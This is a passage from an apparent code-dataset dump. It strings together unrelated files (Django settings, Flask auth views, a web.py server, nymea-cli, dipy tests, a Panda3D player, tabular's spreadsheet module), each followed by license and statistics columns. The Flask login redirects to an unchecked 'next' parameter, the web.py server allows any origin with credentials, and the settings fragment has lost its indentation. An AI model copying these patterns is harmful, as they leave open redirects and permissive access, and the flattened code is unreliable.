USE_ELASTICSEARCH = True
#ELASTICSEARCH_ADDRESS = "127.0.0.1:9200"
ELASTICSEARCH_ADDRESS = "localhost:9200"
# You can use a star to avoid timestamping expansion for example 'logstash-*'
ELASTICSEARCH_LOGSTASH_INDEX = "logstash-"
# use hourly, daily to indicate the logstash index building recurrence
ELASTICSEARCH_LOGSTASH_TIMESTAMPING = "daily"
# Kibana
USE_KIBANA = False
# Use django as a reverse proxy for kibana request
# This will allow you to use scirius authentication to control
# access to Kibana
KIBANA_PROXY = False
# Kibana URL
KIBANA_URL = "http://localhost:9292"
# Kibana index name
KIBANA_INDEX = "kibana-int"
# Kibana version
KIBANA_VERSION = 3
# Number of dashboards to display
KIBANA_DASHBOARDS_COUNT = 20
# Suricata is configured to write stats to EVE
USE_SURICATA_STATS = False
# Logstash is generating metrics on eve events
USE_LOGSTASH_STATS = False
# Influxdb
USE_INFLUXDB = False
INFLUXDB_HOST = "localhost"
INFLUXDB_PORT = 8086
INFLUXDB_USER = "grafana"
INFLUXDB_PASSWORD = "grafana"
INFLUXDB_DATABASE = "scirius"
# Proxy parameters
# Set USE_PROXY to True to use a proxy to fetch ruleset update.
# PROXY_PARAMS contains the proxy parameters.
# If user is set in PROXY_PARAMS then basic authentication will
# be used.
USE_PROXY = False
PROXY_PARAMS = { 'http': "http://proxy:3128", 'https': "http://proxy:3128" }
# For basic authentication you can use
# PROXY_PARAMS = { 'http': "http://user:pass@proxy:3128", 'https': "http://user:pass@proxy:3128" }
GIT_SOURCES_BASE_DIRECTORY = os.path.join(BASE_DIR, 'git-sources/')
# Ruleset generator framework
RULESET_MIDDLEWARE = 'suricata'
LOGIN_URL = '/accounts/login/'
try:
from local_settings import *
except:
pass
if KIBANA_PROXY:
INSTALLED_APPS += ( 'revproxy',)
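# Editor's sketch (not part of the original settings; the values are examples
# only): deployment-specific overrides belong in a local_settings.py next to
# this file, which the try/import above picks up, e.g.
#
#   ELASTICSEARCH_ADDRESS = "es.example.org:9200"
#   USE_KIBANA = True
#   KIBANA_URL = "http://kibana.example.org:9292"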
|
gpl-3.0
| -3,509,663,828,025,243,000
| 24.988304
| 98
| 0.726373
| false
| 3.129577
| false
| false
| false
|
bt3gl/Neat-Problems-in-Python-and-Flask
|
USEFUL/snippets_and_examples_Flask/example_password_reset/app/auth/views.py
|
1
|
4889
|
from flask import render_template, redirect, request, url_for, flash
from flask.ext.login import login_user, logout_user, login_required, \
current_user
from . import auth
from .. import db
from ..models import User
from ..email import send_email
from .forms import LoginForm, RegistrationForm, ChangePasswordForm,\
PasswordResetRequestForm, PasswordResetForm
@auth.before_app_request
def before_request():
if current_user.is_authenticated() \
and not current_user.confirmed \
and request.endpoint[:5] != 'auth.':
return redirect(url_for('auth.unconfirmed'))
@auth.route('/unconfirmed')
def unconfirmed():
if current_user.is_anonymous() or current_user.confirmed:
return redirect(url_for('main.index'))
return render_template('auth/unconfirmed.html')
@auth.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.verify_password(form.password.data):
login_user(user, form.remember_me.data)
return redirect(request.args.get('next') or url_for('main.index'))
flash('Invalid username or password.')
return render_template('auth/login.html', form=form)
@auth.route('/logout')
@login_required
def logout():
logout_user()
flash('You have been logged out.')
return redirect(url_for('main.index'))
@auth.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(email=form.email.data,
username=form.username.data,
password=form.password.data)
db.session.add(user)
db.session.commit()
token = user.generate_confirmation_token()
send_email(user.email, 'Confirm Your Account',
'auth/email/confirm', user=user, token=token)
flash('A confirmation email has been sent to you by email.')
return redirect(url_for('auth.login'))
return render_template('auth/register.html', form=form)
@auth.route('/confirm/<token>')
@login_required
def confirm(token):
if current_user.confirmed:
return redirect(url_for('main.index'))
if current_user.confirm(token):
flash('You have confirmed your account. Thanks!')
else:
flash('The confirmation link is invalid or has expired.')
return redirect(url_for('main.index'))
@auth.route('/confirm')
@login_required
def resend_confirmation():
token = current_user.generate_confirmation_token()
send_email(current_user.email, 'Confirm Your Account',
'auth/email/confirm', user=current_user, token=token)
flash('A new confirmation email has been sent to you by email.')
return redirect(url_for('main.index'))
@auth.route('/change-password', methods=['GET', 'POST'])
@login_required
def change_password():
form = ChangePasswordForm()
if form.validate_on_submit():
if current_user.verify_password(form.old_password.data):
current_user.password = form.password.data
db.session.add(current_user)
flash('Your password has been updated.')
return redirect(url_for('main.index'))
else:
flash('Invalid password.')
return render_template("auth/change_password.html", form=form)
@auth.route('/reset', methods=['GET', 'POST'])
def password_reset_request():
if not current_user.is_anonymous():
return redirect(url_for('main.index'))
form = PasswordResetRequestForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user:
token = user.generate_reset_token()
send_email(user.email, 'Reset Your Password',
'auth/email/reset_password',
user=user, token=token,
next=request.args.get('next'))
flash('An email with instructions to reset your password has been '
'sent to you.')
return redirect(url_for('auth.login'))
return render_template('auth/reset_password.html', form=form)
@auth.route('/reset/<token>', methods=['GET', 'POST'])
def password_reset(token):
if not current_user.is_anonymous():
return redirect(url_for('main.index'))
form = PasswordResetForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is None:
return redirect(url_for('main.index'))
if user.reset_password(token, form.password.data):
flash('Your password has been updated.')
return redirect(url_for('auth.login'))
else:
return redirect(url_for('main.index'))
return render_template('auth/reset_password.html', form=form)
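# Editor's note (not part of the original module): this blueprint is assumed
# to be registered in the application factory, typically along the lines of
#
#   from .auth import auth as auth_blueprint
#   app.register_blueprint(auth_blueprint, url_prefix='/auth')
#
# the '/auth' url_prefix is an assumption for illustration, not taken from
# this repository.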
|
mit
| -1,030,766,068,768,395,900
| 35.485075
| 78
| 0.644713
| false
| 3.923756
| false
| false
| false
|
meahmadi/nsun
|
server.py
|
1
|
2333
|
import web
import traceback
import webbrowser
from web.contrib import template
import os
import json
from datetime import datetime
#from ir.idehgostar.modir.assistant.mind import Mind
from ir.ac.iust.me_ahmadi.multiProcessMind.mind import Mind
render = template.render_genshi(['./templates/'])
urls = (
'/(.*)', 'Assistant'
)
class MyApplication(web.application):
def run(self, port=12010, *middleware):
func = self.wsgifunc(*middleware)
return web.httpserver.runsimple(func, ('0.0.0.0', port))
app = MyApplication(urls, globals())
outbuffer = []
history = []
def getMindOutput(action,args):
Assistant.outbuffer.append([action,args])
def flushOutput():
t = []
t = Assistant.outbuffer
Assistant.outbuffer = []
Assistant.history += t
return t
Mind.singleton(getMindOutput)
class Assistant:
outbuffer = []
history = []
def __init__(self):
pass
def GET(self,name):
print "GET "+name
if not name:
return render.index(root="static");
def OPTIONS(self,args):
web.header('Access-Control-Allow-Origin', '*')
web.header('Access-Control-Allow-Credentials', 'true')
web.header('Access-Control-Allow-Headers','Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
def POST(self,action):
if not action:
return '';
web.header('Access-Control-Allow-Origin', '*')
web.header('Access-Control-Allow-Credentials', 'true')
web.header('Access-Control-Allow-Headers','Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
data = web.data()
data_dict = {}
try:
data_dict = json.loads(data)
except Exception, e:
print "error parsing json:"+ str(e)
pass
if action=="message":
mind = Mind.singleton(getMindOutput)
try:
for line in data_dict["body"].splitlines():
print line
mind.listen(line)
except Exception as e:
print "Error:"+str(e)
results = []
for output in flushOutput():
results.append({'data': output[1],'action':output[0]})
return json.dumps(results)
if action=="update":
results = []
for output in flushOutput():
results.append({'data': output[1],'action':output[0]})
return json.dumps(results)
else:
return "[]"
if __name__ == "__main__":
print "See: localhost:12010 in browser"
webbrowser.get().open('http://localhost:12010/')
app.run(port=12010)
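# Editor's sketch (not part of the original file): the /message endpoint
# expects a raw JSON body with a "body" field, e.g.
#
#   curl -X POST http://localhost:12010/message -d '{"body": "hello"}'
#
# and replies with a JSON list of {"action": ..., "data": ...} items drained
# from the Mind's output buffer; /update drains the buffer without sending
# new input.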
|
gpl-2.0
| -8,180,544,014,247,534,000
| 24.086022
| 109
| 0.672953
| false
| 3.065703
| false
| false
| false
|
guh/guh-cli
|
nymea/notifications.py
|
1
|
3045
|
# -*- coding: UTF-8 -*-
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# Copyright (C) 2015 - 2018 Simon Stuerz <simon.stuerz@guh.io> #
# #
# This file is part of nymea-cli. #
# #
# nymea-cli is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, version 2 of the License. #
# #
# nymea-cli is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with nymea-cli. If not, see <http://www.gnu.org/licenses/>. #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import sys
import socket
import json
import select
import telnetlib
import nymea
def notification_sniffer(nymeaHost, nymeaPort):
global commandId
commandId = 0
print "Connecting notification handler..."
try:
tn = telnetlib.Telnet(nymeaHost, nymeaPort)
except :
print "ERROR: notification socket could not connect the to nymea-server. \n"
return None
print "...OK \n"
#enable_notification(notificationSocket)
enable_notification(tn.get_socket())
try:
x = None
while (x !=ord('\n') and x != 27):
socket_list = [sys.stdin, tn.get_socket()]
read_sockets, write_sockets, error_sockets = select.select(socket_list , [], [])
for sock in read_sockets:
# notification messages:
if sock == tn.get_socket():
packet = tn.read_until("}\n")
packet = json.loads(packet)
nymea.print_json_format(packet)
elif sock == sys.stdin:
x = sys.stdin.readline()
return None
finally:
tn.close()
print "Notification socket closed."
def enable_notification(notifySocket):
global commandId
params = {}
commandObj = {}
commandObj['id'] = commandId
commandObj['method'] = "JSONRPC.SetNotificationStatus"
params['enabled'] = "true"
commandObj['params'] = params
command = json.dumps(commandObj) + '\n'
commandId = commandId + 1
notifySocket.send(command)
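# Editor's note (not part of the original file): the JSON-RPC message sent by
# enable_notification() above looks like (key order may vary)
#
#   {"id": 0, "method": "JSONRPC.SetNotificationStatus", "params": {"enabled": "true"}}
#
# followed by a newline; the server then streams notification packets that
# notification_sniffer() reads and pretty-prints.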
|
gpl-2.0
| 2,748,701,511,971,271,000
| 37.544304
| 92
| 0.469951
| false
| 4.300847
| false
| false
| false
|
maurozucchelli/dipy
|
dipy/tests/test_scripts.py
|
1
|
5495
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
""" Test scripts
If we appear to be running from the development directory, use the scripts in
the top-level folder ``scripts``. Otherwise try and get the scripts from the
path
"""
from __future__ import division, print_function, absolute_import
import sys
import os
import shutil
from os.path import dirname, join as pjoin, isfile, isdir, abspath, realpath
from subprocess import Popen, PIPE
from nose.tools import assert_true, assert_false, assert_equal
import numpy.testing as nt
import nibabel as nib
from nibabel.tmpdirs import InTemporaryDirectory
from dipy.data import get_data
# Need shell to get path to correct executables
USE_SHELL = True
DEBUG_PRINT = os.environ.get('NIPY_DEBUG_PRINT', False)
DATA_PATH = abspath(pjoin(dirname(__file__), 'data'))
def local_script_dir(script_sdir):
# Check for presence of scripts in development directory. ``realpath``
# checks for the situation where the development directory has been linked
# into the path.
below_us_2 = realpath(pjoin(dirname(__file__), '..', '..'))
devel_script_dir = pjoin(below_us_2, script_sdir)
if isfile(pjoin(below_us_2, 'setup.py')) and isdir(devel_script_dir):
return devel_script_dir
return None
LOCAL_SCRIPT_DIR = local_script_dir('bin')
def run_command(cmd, check_code=True):
    if LOCAL_SCRIPT_DIR is not None:
# Windows can't run script files without extensions natively so we need
# to run local scripts (no extensions) via the Python interpreter. On
# Unix, we might have the wrong incantation for the Python interpreter
# in the hash bang first line in the source file. So, either way, run
# the script through the Python interpreter
cmd = "%s %s" % (sys.executable, pjoin(LOCAL_SCRIPT_DIR, cmd))
if DEBUG_PRINT:
print("Running command '%s'" % cmd)
proc = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=USE_SHELL)
stdout, stderr = proc.communicate()
    if proc.poll() is None:
proc.terminate()
if check_code and proc.returncode != 0:
raise RuntimeError('Command "%s" failed with stdout\n%s\nstderr\n%s\n'
% (cmd, stdout, stderr))
return proc.returncode, stdout, stderr
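# Editor-added note (not part of the original test module): a typical invocation mirrors
# the tests below, e.g.
#   code, stdout, stderr = run_command('dipy_fit_tensor', check_code=False)
# where a non-zero exit code only raises if check_code is left at its default of True.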
def test_dipy_peak_extraction():
# test dipy_peak_extraction script
cmd = 'dipy_peak_extraction'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def test_dipy_fit_tensor():
# test dipy_fit_tensor script
cmd = 'dipy_fit_tensor'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def test_dipy_sh_estimate():
# test dipy_sh_estimate script
cmd = 'dipy_sh_estimate'
code, stdout, stderr = run_command(cmd, check_code=False)
assert_equal(code, 2)
def assert_image_shape_affine(filename, shape, affine):
assert_true(os.path.isfile(filename))
image = nib.load(filename)
assert_equal(image.shape, shape)
nt.assert_array_almost_equal(image.get_affine(), affine)
def test_dipy_fit_tensor():
with InTemporaryDirectory() as tmp:
dwi, bval, bvec = get_data("small_25")
# Copy data to tmp directory
shutil.copyfile(dwi, "small_25.nii.gz")
shutil.copyfile(bval, "small_25.bval")
shutil.copyfile(bvec, "small_25.bvec")
# Call script
cmd = ["dipy_fit_tensor", "--mask=none", "small_25.nii.gz"]
out = run_command(" ".join(cmd))
assert_equal(out[0], 0)
# Get expected values
img = nib.load("small_25.nii.gz")
affine = img.get_affine()
shape = img.shape[:-1]
# Check expected outputs
assert_image_shape_affine("small_25_fa.nii.gz", shape, affine)
assert_image_shape_affine("small_25_t2di.nii.gz", shape, affine)
assert_image_shape_affine("small_25_dirFA.nii.gz", shape, affine)
assert_image_shape_affine("small_25_ad.nii.gz", shape, affine)
assert_image_shape_affine("small_25_md.nii.gz", shape, affine)
assert_image_shape_affine("small_25_rd.nii.gz", shape, affine)
with InTemporaryDirectory() as tmp:
dwi, bval, bvec = get_data("small_25")
# Copy data to tmp directory
shutil.copyfile(dwi, "small_25.nii.gz")
shutil.copyfile(bval, "small_25.bval")
shutil.copyfile(bvec, "small_25.bvec")
# Call script
cmd = ["dipy_fit_tensor", "--save-tensor", "--mask=none", "small_25.nii.gz"]
out = run_command(" ".join(cmd))
assert_equal(out[0], 0)
# Get expected values
img = nib.load("small_25.nii.gz")
affine = img.get_affine()
shape = img.shape[:-1]
# Check expected outputs
assert_image_shape_affine("small_25_fa.nii.gz", shape, affine)
assert_image_shape_affine("small_25_t2di.nii.gz", shape, affine)
assert_image_shape_affine("small_25_dirFA.nii.gz", shape, affine)
assert_image_shape_affine("small_25_ad.nii.gz", shape, affine)
assert_image_shape_affine("small_25_md.nii.gz", shape, affine)
assert_image_shape_affine("small_25_rd.nii.gz", shape, affine)
# small_25_tensor saves the tensor as a symmetric matrix following
# the nifti standard.
ten_shape = shape + (1, 6)
assert_image_shape_affine("small_25_tensor.nii.gz", ten_shape,
affine)
|
bsd-3-clause
| -1,704,001,170,354,622,000
| 35.390728
| 84
| 0.648408
| false
| 3.326271
| true
| false
| false
|
MJ-meo-dmt/Ecliptic
|
src/player.py
|
1
|
10301
|
#!/usr/bin/python
# System imports
import sys, math, os
# Panda imports
from panda3d.core import *
from pandac.PandaModules import *
from direct.actor.Actor import Actor
from direct.interval.IntervalGlobal import *
from direct.task import Task
from direct.showbase.DirectObject import DirectObject
from panda3d.core import BitMask32
from panda3d.bullet import *
from direct.showbase.InputStateGlobal import inputState
# Game imports
from devconfig import *
from globals import *
from gui import *
#---------------------------------------------------------------------#
## Main Player Class.
class Player(object):
"""
Player Class:
    This class handles all "Players" in the game (Actors)
@method addEntity: Use this to add a created entity to the global entity Dict{}
"""
def __init__(self):
pass
# These are players and other entities
def addEntity(self, entityKey, entityObject):
"""
        @param entityKey: Preferably the name of the entity
        @param entityObject: Preferably the name of the created entity
"""
# Add entity to the global enity dict{}
ENTITY[entityKey] = entityObject
## MakePlayer Class
# Will move this class under physics.py so that we have some order.
class MakePlayer(DirectObject):
"""
MakePlayer Class:
    This class handles the creation of Players.
Players will be stored in the Entity dict.
"""
def __init__(self):
"""
constructor:
@param name: String_name, for the Player - In game.
@param entityName: String_name for the PC - Player in ENTITY /
dict{} for all uses in code.
"""
self.direction = Vec3(0,0,0)
self.angular_direction = Vec3(0,0,0)
self.speed = 1
self.angular_speed = 3
# Setup Player inventory
self.playerDataStorage = [] # May change
## ADD MOUSE LOOK TASK TO TASKMGR
#taskMgr.add(self.look, 'camera')
# Crouch Flag
self.crouching = False
# Mouse look
self.omega = 0.0
# Setup player input
self.accept('space', self.jump)
self.accept('c', self.crouch) # We need to fix the height
self.accept( "escape",sys.exit )
self.accept('arrow_up', self.up )
self.accept('arrow_down', self.down )
self.accept('arrow_left', self.left )
self.accept('arrow_right', self.right)
self.accept("arrow_up-up", self.idle, ["up"])
self.accept("arrow_down-up", self.idle, ["down"])
self.accept("arrow_left-up", self.idle, ["left"])
self.accept("arrow_right-up", self.idle, ["right"])
#inputState.watchWithModifiers('forward', 'w')
#inputState.watchWithModifiers('left', 'a')
#inputState.watchWithModifiers('reverse', 's')
#inputState.watchWithModifiers('right', 'd')
#inputState.watchWithModifiers('turnLeft', 'q')
#inputState.watchWithModifiers('turnRight', 'e')
#inputState.watchWithModifiers('turnRight', 'e')
# Camera Setup for player
# Get the screen size for the camera controller
self.winXhalf = base.win.getXSize()/2
self.winYhalf = base.win.getYSize()/2
## SETUP CHARACTER AND CHARACTER SHAPE
# Setup Shape
# units = meters
# body height : 1.8 meters
# eyes line : 1.8 - 0.11 meters = 1.69 meters
# h is distance between the centers of the 2 spheres
# w is radius of the spheres
# 1.8 = 0.3 + 1.2 + 0.3
# center : 1.8/2 = 0.9
# camera height : 1.69-0.9 = 0.79
h = 1.2
w = 0.3
        # Player needs a different setup, same as the Bullet character controller.
        # At the moment force gets added directly onto the node, making it behave ballistically.
shape = BulletCapsuleShape(w, h , ZUp)
node = BulletRigidBodyNode('Box')
node.setMass(1.0)
node.addShape(shape)
self.node = node
node.setAngularDamping(10)
np = GAMEPLAY_NODES['PLAYER'].attachNewNode(node)
np.setPos(0, 0, 1)
self.arm = np.attachNewNode('arm')
self.arm.setPos(0,0,0.2)
self.np = np
PHYSICS['WORLD'].attachRigidBody(node)
#self.character = BulletCharacterControllerNode(shape, 1, 'Player')
#-------------------------------------------------------------------#
# PLAYER GRAVITY SETTINGS AND FALL SPEED #
#self.character.setGravity(0.87)
#self.character.setFallSpeed(0.3)
#
#-------------------------------------------------------------------#
#self.characterNP = GAMEPLAY_NODES['PLAYER'].attachNewNode(self.character)
#self.characterNP.setPos(0, 0, 2) # May need some tweaking
#self.characterNP.setCollideMask(BitMask32.allOn())
# Attach the character to the base _Physics
#PHYSICS['WORLD'].attachCharacter(self.character)
# Reparent the camera to the player
#base.camera.reparentTo(self.np)
#base.camera.setPos(0,0,0.79)
#base.camLens.setNearFar(camNear,camFar)
base.camLens.setFov(90)
base.disableMouse()
gui = Crosshair()
self.arm = loader.loadModel('../assets/models/test.egg')
screens = self.arm.findAllMatches('**')
self.arm_screen = None
rot = 0
pos = 0
for screen in screens :
if screen.hasTag('screen'):
self.arm_screen = screen
rot = screen.getHpr()
pos = screen.getPos()
print("rotation"+str(rot))
self.actor = Actor('../assets/models/test.egg', {'anim1':'../assets/models/test-Anim0.egg'})
self.actor.reparentTo(self.np)
self.actor.loop('anim1')
self.actor.setPos(.0,-0.1,0.4)
self.actor.setH(180)
self.actor.node().setBounds(OmniBoundingVolume())
self.actor.node().setFinal(True)
#self.actor.setTwoSided(True)
#self.actor.reparentTo(self.world.buffer_system.geom_cam)
#self.actor.hide(self.world.buffer_system.light_mask)
# attach smth to hand
picker = self.actor.exposeJoint(None,"modelRoot","hand_picker")
arm_bone = self.actor.exposeJoint(None,"modelRoot","screen_picker")
self.arm_screen.reparentTo(arm_bone)
self.arm_screen.setH(self.arm_screen.getH()+90)
self.temp_animate = self.arm_screen
self.picker = picker
taskMgr.add(self.update,'update player position')
# Player Debug:
#print ""
#print "Player Character controller settings: "
#print ""
#print "Character Gravity: ", self.character.getGravity()
#print "Character Max Slope: ",self.character.getMaxSlope()
#print ""
def up(self):
self.direction += Vec3(0,1,0)
self.angular_direction += Vec3(1,0,0)
def down(self):
self.direction += Vec3(0,-1,0)
def left(self):
self.direction += Vec3(-1,0,0)
def right(self):
self.direction += Vec3(1,0,0)
def idle(self, key):
if(key == "up"):
self.direction -= Vec3(0,1,0)
self.angular_direction -= Vec3(1,0,0)
elif(key == "down"):
self.direction -= Vec3(0,-1,0)
elif(key == "left"):
self.direction -= Vec3(-1,0,0)
elif(key == "right"):
self.direction -= Vec3(1,0,0)
    # Handle player jumping. (Note: uses self.character, which belongs to the
    # commented-out BulletCharacterControllerNode setup above.)
def jump(self):
self.character.setMaxJumpHeight(2.3)
self.character.setJumpSpeed(4.5)
self.character.doJump()
    # Handle player crouch. (Known bug: relies on self.characterNP, which is commented out above.)
def crouch(self):
self.crouching = not self.crouching
sz = self.crouching and 0.6 or 1.0
#self.character.getShape().setLocalScale(Vec3(1, 1, sz))
self.characterNP.setScale(Vec3(1, 1, sz) * 0.3048)
#self.characterNP.setPos(0, 0, -1 * sz)
# Handle player mouse
def look(self, task):
dt = globalClock.getDt()
# Handle mouse
md = base.win.getPointer(0)
x = md.getX()
y = md.getY()
if base.win.movePointer(0, self.winXhalf, self.winYhalf):
self.omega = (x - self.winXhalf)*-mouseSpeed
base.camera.setP( (clampScalar(-90,90, base.camera.getP() - (y - self.winYhalf)*0.09)) )
self.processInput(dt)
return task.cont
def update(self,task):
dt = globalClock.getDt()
self.np.setPos(self.np,self.direction * dt * self.speed)
base.camera.setPos(self.np.getPos()+ Vec3(0,0,0.79))
md = base.win.getPointer(0)
x = md.getX()
y = md.getY()
if base.win.movePointer(0, self.winXhalf, self.winYhalf):
base.camera.setP(base.camera.getP() - (y - self.winYhalf)*dt*self.angular_speed)
self.np.setH(self.np.getH() - (x - self.winXhalf)*dt*self.angular_speed)
base.camera.setH(self.np.getH())
base.camera.setR(self.np.getR())
self.node.setAngularFactor(0)
self.node.setAngularVelocity(0)
BUFFER_SYSTEM['main'].reflection_cube.setPos(base.camera.getPos())
BUFFER_SYSTEM['main'].reflection_cube.setHpr(base.camera.getHpr())
return task.cont
# Handle player input
def processInput(self, dt):
print(self.direction)
speed = Vec3(0, 0, 0)
#@param PCSpeed: Player move speed under devconfig.py
if inputState.isSet('forward'): speed.setY( PCSpeed)
if inputState.isSet('reverse'): speed.setY(-PCSpeed)
if inputState.isSet('left'): speed.setX(-PCSpeed)
if inputState.isSet('right'): speed.setX( PCSpeed)
self.character.setAngularMovement(self.omega)
self.character.setLinearMovement(speed, True)
|
bsd-3-clause
| 5,954,991,454,922,168,000
| 31.701587
| 101
| 0.558878
| false
| 3.616924
| false
| false
| false
|
yamins81/tabular
|
tabular/spreadsheet.py
|
1
|
57202
|
"""
Spreadsheet-style functions for NumPy ndarray with structured dtype or
recarray objects:
aggregate, aggregate_in, pivot, addrecords, addcols, deletecols, renamecol,
replace, colstack, rowstack, nullvalue
Note that these functions are also wrapped as methods of the tabular tabarray
object, which is a subclass of the numpy ndarray.
**See Also:**
:class:`tabular.tab.tabarray`
"""
__all__ = ['aggregate', 'aggregate_in', 'pivot', 'addrecords', 'addcols',
'deletecols', 'renamecol', 'replace', 'colstack', 'rowstack',
'join', 'strictjoin', 'DEFAULT_RENAMER']
import numpy as np
import types
import tabular.utils as utils
import tabular.fast as fast
from tabular.colors import GrayScale
def isftype(x):
    a = isinstance(x, types.FunctionType)
b = isinstance(x,types.BuiltinFunctionType)
c = isinstance(x,types.MethodType)
d = isinstance(x,types.BuiltinMethodType)
return a or b or c or d
def aggregate(X, On=None, AggFuncDict=None, AggFunc=None,
AggList=None, returnsort=False, KeepOthers=True,
keyfuncdict=None):
"""
Aggregate a ndarray with structured dtype (or recarray) on columns for
given functions.
Aggregate a numpy recarray (or tabular tabarray) on a set of specified
factors, using specified aggregation functions.
Intuitively, this function will aggregate the dataset `X` on a set of
columns, whose names are listed in `On`, so that the resulting aggregate
data set has one record for each unique tuples of values in those columns.
The more factors listed in `On` argument, the "finer" is the aggregation,
the fewer factors, the "coarser" the aggregation. For example, if::
On = 'A'
the resulting tabarray will have one record for each unique value of a in
X['A'], while if On = ['A', 'B'] then the resulting tabarray will have
one record for each unique (a, b) pair in X[['A', 'B']]
The `AggFunc` argument is a function that specifies how to aggregate the
    factors _not_ listed in `On`, e.g. the so-called `Off` columns. For
    instance, if On = ['A', 'B'] and `C` is a third column, then::
AggFunc = numpy.mean
will result in a tabarray containing a `C` column whose values are the
average of the values from the original `C` columns corresponding to each
unique (a, b) pair.
    If you want to specify a different aggregation method for each `Off` column,
use `AggFuncDict` instead of AggFunc. `AggFuncDict` is a dictionary of
functions whose keys are column names. AggFuncDict[C] will be applied to
the C column, AggFuncDict[D] to the D column, etc. AggFunc and AggFuncDict
can be used simultaneously, with the elements of AggFuncDict overriding
AggFunc for the specified columns.
Using either AggFunc or AggFuncDict, the resulting tabarray has the same
    columns as the original tabarray. Sometimes you want to create new
    aggregate columns that do not correspond to one specific column in the
    original tabarray but instead take data from several. To achieve this, use the
AggList argument. AggList is a list of three-element lists of the form:
(name, func, col_names)
where `name` specifies the resulting column name in the aggregated tabarray,
`func` specifies the aggregation function, and `col_names` specifies the
list of columns names from the original tabarray that will be needed to
compute the aggregate values. (That is, for each unique tuple `t` in the `On`
columns, the subarray of X[col_names] for which X[On] == t is passed to
`func`.)
If an `Off` column is _not_ provided as a key in `AggFuncDict`, a default
aggregator function will be used: the sum function for numerical columns,
concatenation for string columns.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.aggregate`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The data set to aggregate.
**On** : string or list of strings, optional
List of column names in `X`.
**AggFuncDict** : dictionary, optional
Dictionary where
* keys are some (all) column names of `X` that are NOT
in `On`
* values are functions that can be applied to lists or
numpy arrays.
This specifies how to aggregate the factors _not_ listed in
`On`, e.g. the so-called `Off` columns.
**AggFunc** : function, optional
Function that can be applied to lists or numpy arrays,
specifying how to aggregate factors not listed in either
`On` or the keys of `AggFuncDict`, e.g. a "default"
aggregation function for the `Off` columns not explicitly
listed in `AggFuncDict`.
**AggList** : list, optional
List of tuples
**returnsort** : Boolean, optional
If `returnsort == True`, then return a list of indices
describing how `X` was sorted as a result of aggregation.
Default value is `False`.
**Returns**
**agg** : numpy ndarray with structured dtype
Aggregated data set.
**index_array** : numpy ndarray (int, 1D)
Returned only if `returnsort == True`. List of indices
describing how `X` was sorted as a result of aggregation.
**See also:**
:func:`tabular.spreadsheet.aggregate_in`
"""
names = X.dtype.names
if len(X) == 0:
if returnsort:
return [X,None]
else:
return X
if On == None:
On = []
elif isinstance(On,str):
On = On.split(',')
assert all([o in names for o in On]), \
("Axes " + str([o for o in On if o not in names]) +
" can't be found.")
if AggList is None:
AggList = []
if AggFuncDict:
AggList += AggFuncDict.items()
for (i,x) in enumerate(AggList):
if utils.is_string_like(x):
AggList[i] = (x,)
elif isinstance(x,tuple):
assert 1 <= len(x) <= 3
assert isinstance(x[0],str)
if len(x) == 2 and isinstance(x[1],tuple):
assert len(x[1]) == 2
AggList[i] = (x[0],) + x[1]
else:
            raise ValueError, 'Each element of AggList must be a string or a tuple.'
Names = [x[0] for x in AggList]
assert Names == utils.uniqify(Names)
if KeepOthers:
AggList = [(x,) for x in X.dtype.names if x not in Names + On] + AggList
DefaultChoices = {'string':[], 'sum':[], 'first':[]}
for (i,v) in enumerate(AggList):
if len(v) == 1:
assert v[0] in X.dtype.names
if AggFunc:
AggList[i] = v + (AggFunc,v[0])
else:
AggList[i] = v + (DefaultChooser(X,v[0], DefaultChoices),v[0])
elif len(v) == 2:
if isftype(v[1]):
assert v[0] in X.dtype.names
AggList[i] = v + (v[0],)
elif utils.is_string_like(v[1]):
if AggFunc:
_a = v[1] in X.dtype.names
_b = isinstance(v[1],list) and set(v[1]) <= set(X.dtype.names)
assert _a or _b
AggList[i] = (v[0], AggFunc, v[1])
else:
assert v[1] in X.dtype.names
AggList[i] = (v[0],
DefaultChooser(X,v[1],
DefaultChoices),
v[1])
else:
                raise ValueError,'No specification of name for column.'
elif len(v) == 3:
if utils.is_string_like(v[2]):
assert isftype(v[1]) and v[2] in X.dtype.names
else:
assert isftype(v[1]) and \
(isinstance(v[2],list) and \
set(v[2]) <= set(X.dtype.names))
if len(DefaultChoices['sum']) > 0:
print('No aggregation function provided for', DefaultChoices['sum'],
'so assuming "sum" by default.')
if len(DefaultChoices['string']) > 0:
print('No aggregation function provided for', DefaultChoices['string'],
'so assuming string concatenation by default.')
if len(DefaultChoices['first']) > 0:
print('No aggregation function provided for', DefaultChoices['first'],
'and neither summing nor concatenation works, so choosing '
'first value by default.')
return strictaggregate(X, On, AggList, returnsort, keyfuncdict)
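# Editor-added usage sketch (not part of the original module). The column names 'A' and
# 'B' are hypothetical; the call follows the docstring of aggregate() above.
def _example_aggregate_usage():
    X = utils.fromrecords([('x', 1), ('x', 2), ('y', 5)], type=np.ndarray,
                          names=['A', 'B'])
    # One output record per unique value of X['A']; the 'B' values are summed per group.
    return aggregate(X, On='A', AggFunc=sum)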
def DefaultChooser(X,o,DC):
try:
sum(X[o][0:1])
DC['sum'].append(o)
return sum
except:
try:
''.join(X[o][0:1])
DC['string'].append(o)
return ''.join
except:
DC['first'].append(o)
return lambda x : x[0]
